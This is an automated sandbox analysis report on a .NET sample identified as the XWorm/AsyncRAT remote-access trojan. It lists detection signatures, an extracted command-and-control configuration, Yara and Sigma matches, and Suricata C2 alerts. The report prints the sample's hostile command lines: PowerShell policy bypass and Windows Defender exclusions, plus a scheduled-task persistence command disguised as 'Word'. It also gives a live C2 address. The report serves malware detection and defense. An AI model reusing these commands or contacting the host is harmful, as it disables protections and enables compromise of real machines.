
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565292
MD5: 9ff920c7c3199dbfff9b507272c9f65a
SHA1: 8a588fb79066649adcdf2f5f1614d6858f0e4ac6
SHA256: f790a1104f5eec4b7c03064d9063c9e69d1f55e5bce27ad83474fb2aa00310e9
Tags: NET, exe, MSIL, user-jstrosch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
    • powershell.exe (PID: 7020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8084 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Word.exe (PID: 8184 cmdline: C:\Users\user\AppData\Roaming\Word.exe MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • Word.exe (PID: 4016 cmdline: "C:\Users\user\AppData\Roaming\Word.exe" MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • Word.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Roaming\Word.exe" MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • Word.exe (PID: 316 cmdline: C:\Users\user\AppData\Roaming\Word.exe MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • cleanup
{"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara matches on the submitted file (Source, Rule, Description, Author, Strings):
Source: file.exe, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: file.exe, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: file.exe, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0xe99e:$s6: VirtualBox
  • 0xe8fc:$s8: Win32_ComputerSystem
  • 0x100de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1017b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf656:$cnc4: POST / HTTP/1.1

Yara matches on the dropped file (Source, Rule, Description, Author, Strings):
Source: C:\Users\user\AppData\Roaming\Word.exe, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Word.exe, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Word.exe, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0xe99e:$s6: VirtualBox
  • 0xe8fc:$s8: Win32_ComputerSystem
  • 0x100de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1017b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf656:$cnc4: POST / HTTP/1.1

Yara matches on memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0xf416:$s6: VirtualBox
  • 0xf374:$s8: Win32_ComputerSystem
  • 0x10b56:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10bf3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10d08:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x100ce:$cnc4: POST / HTTP/1.1
Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0xe79e:$s6: VirtualBox
  • 0xe6fc:$s8: Win32_ComputerSystem
  • 0xfede:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xff7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10090:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf456:$cnc4: POST / HTTP/1.1
Source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security

Yara matches on unpacked PEs (Source, Rule, Description, Author, Strings):
Source: 0.0.file.exe.260000.0.unpack, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: 0.0.file.exe.260000.0.unpack, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: 0.0.file.exe.260000.0.unpack, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0xe99e:$s6: VirtualBox
  • 0xe8fc:$s8: Win32_ComputerSystem
  • 0x100de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1017b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf656:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\Word.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 5668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Word
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 5668, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe", ProcessId: 8084, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
Suricata alerts, SID 2852870:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:20.696552+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49829 | TCP
2024-11-29T15:20:22.535915+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:28.820631+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:36.482297+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:50.495112+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:58.830595+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:21:04.426499+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:21:19.403961+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP

Suricata alerts, SID 2852923:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:15.806058+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:15.926061+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.046078+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.166168+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.287698+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.408129+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.528343+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.648418+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.888810+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.009313+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.132028+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.252230+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.376092+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.496165+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.660928+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.781033+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.901100+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.021425+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.141579+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.262076+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.424695+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.545159+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.665339+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.786270+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.906505+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.966388+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.086730+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.206697+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.327415+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.447502+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.567736+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.785059+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.905186+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.025248+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.145348+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.265461+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.381652+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.501705+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.622209+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.696654+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:22.539252+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:36.485506+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:50.497403+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.428611+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:19.404980+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP

Suricata alerts, SID 2852874:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:28.820631+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:58.830595+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP

Suricata alerts, SID 2852873:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:15.806058+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:15.926061+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.046078+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.166168+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.287698+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.408129+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.528343+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.648418+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.888810+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.009313+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.132028+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.252230+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.376092+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.496165+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.660928+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.781033+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.901100+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.021425+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.141579+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.262076+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.424695+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.545159+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.665339+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
